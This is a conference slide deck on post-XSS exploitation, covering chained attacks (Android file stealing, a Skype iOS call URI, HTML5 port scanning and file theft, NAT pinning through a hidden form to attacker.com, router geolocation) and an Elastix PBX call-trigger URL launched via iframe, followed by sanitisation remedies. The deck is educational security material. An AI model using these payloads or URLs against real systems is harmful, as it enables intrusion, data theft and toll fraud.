Embed Size (px)
DESCRIPTION
This is the presentation I used at the National Conference on “Current Scenario & Emerging trends in Information Technology" held at MSIT in march 2013. Here is the link to the whitepaper : http://www.exploit-db.com/wp-content/themes/exploit/docs/24559.pdf
Citation preview
Post XSS Exploitation Advanced Attacks and Remedies
ByMs. Kritika Sobti
Mr. Adwiteeya Agrawal
Introduction to XSS
• Definition :
Cross Site Scripting is a web application vulnerability which enables us to execute scripts by passing them as input variables. Here the parameters aren't sanitized.
• Types of XSS 1. Reflected2. Stored3. DOM based
Reflected XSS
Input : XSSOutput : Search Result
Input: <script>alert(“XSS”)</script>
Output : Script Executed
Stored XSS
Certain Parameters that are permanently stored on the website
Script entered as those parameters and hence executed whenever viewed.
DOM based XSSDOM Based XSS is an XSS attack wherein the script is executed as a result of modifying the DOM “environment” in the victim’s browser.
What is POST XSS Exploitation?
• Combining XSS vulnerability with other web applications vulnerabilities to execute even more dangerous attacks.
• Some Of the Attacks :1. Android file stealing.2. URI scheme for Skype on IOS. 3. HTML5 Vulnerabilities.4. IRC NAT pinning and Geo-location.5. Our New Module
Android File Stealing
Android 2.2 user visits a link that initiates a download of a file xyz.html
The user is not notified and file is saved at sdcard/downloads
Javascript is used to access the downloaded file and other files in the same local context.
Skype’s Improper URI scheme on IOSUsing embeddable webkit on IOS, combined with URI schemes of third party applications, skype allows a call to be made with just the following URI :skype://1900expensivepremiumnumber?call
The Skype application developed for iOS uses a locally stored HTML file to display chat messages from other Skype users, but it fails to properly encode the incoming user's "Full Name", allowing an attacker to craft malicious JavaScript code that runs when the victim views the message.
HTML5 Vulnerabilities(1)• Using API the way it is not meant be HTML5 has two APIs for making cross domain calls - Cross Origin Requests
and WebSockets. By using these, JavaScript can make connections to any IP and to any port(apart from blocked ports), making them an ideal candidate for port scanning. These API's can be exploited to determine if the port being connected to is open, closed or filtered.
HTML5 Vulnerabilities (2)• Using API the way it is not meant be The File API in HTML5 allows JavaScript to access the file once it is chosen by the
user (i.e. before uploading it). It can also be used maliciously to steal your files in XSS attack. With styling input type=file control may be used so that the user is unaware that he's going to upload the file.
However input type=file directory is a splendid feature which allows the user to upload contents of a chosen directory thus giving access of the whole directory to the attacker.
NAT Pinning• When the victim clicks on an XSS vulnerable URL that has a hidden form
connecting to http://attacker.com:6667 (IRC port), he submits the form without knowing. An HTTP connection is created to the (fake) IRC server run by the attacker, that simply listens. The victim’s router sees an "IRC connection" (even though its client is speaking in HTTP) and an attempt at a ‘DCC chat’. DCC chats require opening of a local port on the client to which the remote chatter to connect back. Since the router is blocking all inbound connections, it decides to forward any traffic to the port in the DCC chat back to the victim.
XSSMAP - Geo Location
Google while collecting data for the Google Street View had also collected data of the wireless networks in the vicinity and the MAC address of those routers and then mapped them to the GPS co-ordinates. XSS can retrieve the MAC address of the target's router and then uses Google Maps to retrieve GPS co-ordinates
Our New Module – The concept• Elastix 2.2.0 VoIP based PBX, with a web interface enables registered SIP clients to
make calls just by visiting a URL.
After visiting :https://IP_address_of_Elastix/recordings/misc/callme_page.php?action=c&callmenum=Extension@from-internal/h
Executed Via :Iframe’s source
Integration with XSSF
Why XSSF ?
• Has amazing native modules• Integrates with metasploit and facilitates using
exploits in msf• Development and all setting are included in
the single file(module)
Protection against XSS• Various filters can be used to sanitize the inputs and prevent XSS vulnerabilities.
These filters keep a watch on the user inputs and checks for JavaScript or HTTP POST in the input and then stop these scripts from being executed.
• A large number of Security Libraries are also available for encoding user inputs such as: OWASP Encoding Project : Google Code
HTML Purifier or Htmlawed : for PHPAnti-XSS Class : for .NET ApplicationsAntiSamy API : for .NETXSS-HTML-Filter : for Java
Filters Description
FILTER_SANITIZE_ENCODED URL-encode string, optionally strip or encode special characters.
htmlentities For HTML filtering
FILTER_SANITIZE_MAGIC_QUOTES For Applying addslashes()
Protection against POST XSS• Protection against post XSS involves prevention against execution of scripts entered
as input variables.
• Cookie security protection can be implemented by limiting the domain and path for accepting cookies, setting them as HttpOnly, using SSL and never storing confidential data in cookies.
• Another method can be to disable the use of client site scripts.
• Various browser add-ons are also available for prevention against XSS vulnerabilities. Some of the popular add-ons are NoScript for FireFox and NotScripts for Chrome and Opera.
Thanks
